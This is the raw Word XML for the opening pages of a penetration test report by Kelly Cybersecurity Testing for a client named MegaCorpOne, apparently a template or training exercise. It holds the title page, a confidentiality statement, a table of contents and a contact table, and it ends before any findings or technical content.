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10F" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="0B7F94"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_5bapgmi9fqbm" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="0B7F94"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>MegaCorpOne</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="0B7F94"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_r2aetg8pz8ry" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="0B7F94"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_fw5tv1gr8wh4" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="0B7F94"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Penetration Test Report</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="1"/>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="B5B5B5"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Kelly Cybersecurity Testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="B5B5B5"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>, LLC</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pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="0B7F94"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_30j0zll" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidRPr="00CB0356">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_55wpore5x264" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Confidentiality Statement</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This document contains confidential and privileged information from MegaCorpOne Inc. (henceforth known as MegaCorpOne). The information contained in this document is confidential and may constitute inside or non-public information under international, fede</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ral, or state laws. Unauthorized forwarding, printing, copying, distribution, or use of such information is strictly prohibited and may be unlawful. If you are not the intended recipient, be aware that any disclosure, copying, or distribution of this docum</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ent or its parts is prohibited.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="240" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="222368"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB0356">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_xig2fyn6v6m3" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="240" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="222368"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="1235130771"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
          <w:pPr>
            <w:tabs>
              <w:tab w:val="right" w:pos="9350"/>
            </w:tabs>
            <w:spacing w:after="100" w:line="240" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:ascii="Libre Franklin Medium" w:eastAsia="Libre Franklin Medium" w:hAnsi="Libre Franklin Medium" w:cs="Libre Franklin Medium"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00CB0356">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00CB0356">
            <w:instrText xml:space="preserve"> TOC \h \u \z \t "Heading 1,1,Heading 2,2,Heading 3,3,Heading 4,4,Heading 5,5,Heading 6,6,"</w:instrText>
          </w:r>
          <w:r w:rsidRPr="00CB0356">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_30j0zll">
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Confidentiality Statement</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
              <w:t>2</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w:anchor="_1fob9te">
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Contact Information</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
              <w:t>4</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w:anchor="_3znysh7">
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Document History</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
              <w:t>4</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w:anchor="_2et92p0">
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Introduction</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
              <w:t>5</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3dy6vkm">
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Assessment Objective</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
              <w:t>5</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w:anchor="_2s8eyo1">
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Penetration Testing Methodology</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
              <w:t>6</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17dp8vu">
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Reconnaissance</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
              <w:t>6</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3rdcrjn">
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Identification of Vulnerabilities and Services</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
              <w:t>6</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26in1rg">
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Vulnerability Exploitation</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
              <w:t>6</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lnxbz9">
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Reporting</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
              <w:t>6</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w:anchor="_35nkun2">
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Scope</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
              <w:t>7</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r:id="rId5" w:anchor="heading=h.44sinio">
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Executive Summary of Findings</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
              <w:t>8</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z337ya">
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Grading Methodology</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
              <w:t>8</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3j2qqm3">
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Summary of Strengths</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
              <w:t>9</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
          <w:pPr>
            <w:tabs>
              <w:tab w:val="right" w:pos="9350"/>
            </w:tabs>
            <w:spacing w:after="100" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="210"/>
            <w:rPr>
              <w:rFonts w:ascii="Libre Franklin Medium" w:eastAsia="Libre Franklin Medium" w:hAnsi="Libre Franklin Medium" w:cs="Libre Franklin Medium"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_1y810tw">
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Summary of Weaknesses</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
              <w:t>9</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r:id="rId6" w:anchor="heading=h.4i7ojhp">
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Executive Summary Narrative</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
              <w:t>10</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r:id="rId7" w:anchor="heading=h.2xcytpi">
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Summary Vulnerability Overview</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
              <w:t>11</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r w:rsidRPr="00CB0356">
            <w:rPr>
              <w:sz w:val="21"/>
              <w:szCs w:val="21"/>
            </w:rPr>
            <w:t>Vulnerability Findings</w:t>
          </w:r>
          <w:hyperlink w:anchor="_1ci93xb">
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
              <w:t>12</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
          <w:pPr>
            <w:tabs>
              <w:tab w:val="right" w:pos="9350"/>
            </w:tabs>
            <w:spacing w:after="100" w:line="240" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:ascii="Libre Franklin Medium" w:eastAsia="Libre Franklin Medium" w:hAnsi="Libre Franklin Medium" w:cs="Libre Franklin Medium"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_3whwml4">
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>MITRE ATT&amp;CK Navigator Map</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
              <w:t>13</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
          <w:pPr>
            <w:spacing w:line="240" w:lineRule="auto"/>
            <w:rPr>
              <w:b/>
              <w:sz w:val="21"/>
              <w:szCs w:val="21"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00CB0356">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="0B7F94"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_1fob9te" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidRPr="00CB0356">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_b9q8tjomijl2" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidRPr="00CB0356">
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Contact Information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a0"/>
        <w:tblW w:w="9297" w:type="dxa"/>
        <w:tblInd w:w="35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53"/>
        <w:gridCol w:w="6444"/>
      </w:tblGrid>
      <w:tr w:rsidR="0088310F" w:rsidRPr="00CB0356">
        <w:trPr>
          <w:trHeight w:val="451"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2853"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Company Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6444" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Kelly Cybersecurity Testing, LLC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0088310F" w:rsidRPr="00CB0356">
        <w:trPr>
          <w:trHeight w:val="451"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2853"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Contact Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6444" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Kelly Leihy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0088310F" w:rsidRPr="00CB0356">
        <w:trPr>
          <w:trHeight w:val="451"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2853"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Contact Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6444" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Penetration Tester</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0088310F" w:rsidRPr="00CB0356">
        <w:trPr>
          <w:trHeight w:val="442"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2853"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Contact Phone</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6444" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>555.224.2411</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0088310F" w:rsidRPr="00CB0356">
        <w:trPr>
          <w:trHeight w:val="370"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2853"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Contact Email</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6444" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CB0356">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>ContactUs@KCT.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="0088310F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0088310F" w:rsidRPr="00CB0356" w:rsidRDefault="00CB0356">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="002060"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_3znysh7" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="9"/>
